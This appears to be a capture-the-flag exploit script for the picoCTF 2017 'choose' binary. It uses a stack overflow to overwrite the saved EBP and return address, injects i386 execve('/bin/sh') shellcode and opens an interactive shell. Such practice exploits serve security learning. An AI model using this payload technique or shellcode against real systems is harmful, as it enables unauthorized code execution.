exploit.py
#!/usr/bin/python
import sys
import time
import argparse
from pwn import *
# setting
# pwntools context for the target: 32-bit little-endian Linux, so the p32()
# calls in main pack 4-byte little-endian words.
context.arch = 'i386'
context.os = 'linux'
context.endian = 'little'
context.word_size = 32
# ['CRITICAL', 'DEBUG', 'ERROR', 'INFO', 'NOTSET', 'WARN', 'WARNING']
context.log_level = 'INFO'
# Raw machine-code bytes that main appends to payload2 (this is a Python 2
# script, so the "\x.." escapes are literal bytes). The sequence is kept
# byte-identical and is not annotated here.
shellcode = "\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff"
def get_addr_of_enemy(r):
    """Read the 'Wizard sight' line from tube *r* and return the address text.

    Everything up to and including the fixed prefix is consumed and echoed
    to stdout (like the rest of this script); the remainder of that line,
    minus trailing whitespace, is returned unchanged.
    """
    consumed = r.recvuntil("Your sight shows the enemy at ")
    # print() with a single argument prints the same as the Python 2
    # print statement used elsewhere in this file.
    print(consumed)
    line = r.recvuntil('\n')
    return line.rstrip()
#--------------------------------------------------------------------------
if __name__ == "__main__":
    # Python 2 script (print statements; str payloads are raw bytes).
    # Flags: -d/--dbg attaches gdb to the local process, -r/--remote talks to
    # the challenge host instead of running ./choose locally.
    parser = argparse.ArgumentParser(description='Exploit the bins.')
    parser.add_argument('--dbg' , '-d', action="store_true")
    parser.add_argument('--remote', '-r', action="store_true")
    args = parser.parse_args()
    if args.remote:
        r = remote('shell2017.picoctf.com', 43651)
    else:
        r = process('./choose')
    if args.dbg:
        # The gdb script is a runtime string; its lines stay at column 0 so
        # the commands gdb receives are unchanged.
        gdb.attach(r, """
vmmap
b *main
""")
    # 0x80ed044 <inputStr> size 8bytes
    # Menu reference (bare string, no effect at runtime): menu letter ->
    # enemy, the item it grants, and the struct size the author observed.
    """
Enter 'o' for an orc #Blocking sword 0x14
'g' for a goblin #Improved Healing 0x14
'k' for a kobold #Shield Stengthening 0x14
'u' for a unicorn #Sword sharpening 0x18
'c' for a centaur #Healing Potion 0x18
't' for a troll #Wizard sight 0x14
"""
    # Size of structs are different due to memory alignment
    # Menu choices: one 't' (troll / Wizard sight) followed by ten 'u'
    # (unicorn). sendline's return value is echoed here and below.
    print r.sendline('t')
    for i in range(0,10):
        print r.sendline('u')
    #Use this to overwrite the EBP and return
    # Eleven name entries, each per the author's annotations: 2 filler bytes,
    # a saved-EBP value 6 bytes before inputStr, a return address, one pad
    # word. The addresses are constants specific to this challenge binary;
    # the script does not derive them (see the disabled probe below).
    print r.recvuntil("Enter a name for this")
    for i in range(0,11):
        payload = 'aa'
        payload += p32(0x080ed044-6) # EBP
        payload += p32(0x08048eb7) # RET
        payload += p32(100) # pad
        print r.sendline(payload)
    # Disabled probe (bare string, no effect at runtime): sends 'a' eleven
    # times and prints each enemy address and the delta to the previous one
    # via get_addr_of_enemy.
    """
enemy_addrs = []
#figuring out address and sizes
for i in range(0,11):
print r.sendline('a')
addr = int(get_addr_of_enemy(r)[2:],16)
enemy_addrs.append(addr)
previous = 0
for i in enemy_addrs:
print "%s: diff = %s" %(hex(i), hex(i - previous))
previous = i
print '-'*80
"""
    # Fight loop: parse the integer after 'You have ' and keep sending 'a'
    # until the reported health is below 70 (the author's threshold), with a
    # hard cap of 100 rounds. rstrip().lstrip() is equivalent to strip().
    print r.sendline('a')
    for i in range(0,100):
        print r.recvuntil('You have ')
        health = int(r.recvuntil(' ').rstrip().lstrip())
        print "health now is %d" %health
        if (70 > health):
            print "We are done here, move along, nothing to see"
            break
        print r.sendline('a')
    #We are at the final last blow. After this we exit the function,
    # so load the inputStr with values to use. We pointed EBP to this buffer
    # so that the address we jump to will load reletive to ebp
    payload = 'HH'
    payload += p32(0x80ed040) #Address to read data to
    payload += 'AAA' #Length of bytes to read. This is not needed though
    r.sendline(payload)
    # Second input: 2 filler bytes, the pointer the author labels as the
    # return target, the shellcode string from the top of the file, then
    # the literal "/bin/sh".
    payload2 = ''
    payload2 += 'aa' #first two chars are just junk
    payload2 += p32(0x80ed04a) #Return pointer, which points to shellcode
    payload2 += shellcode
    #"\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff"
    payload2 += "/bin/sh"
    r.sendline(payload2)
    # Drop to interactive console
    r.interactive()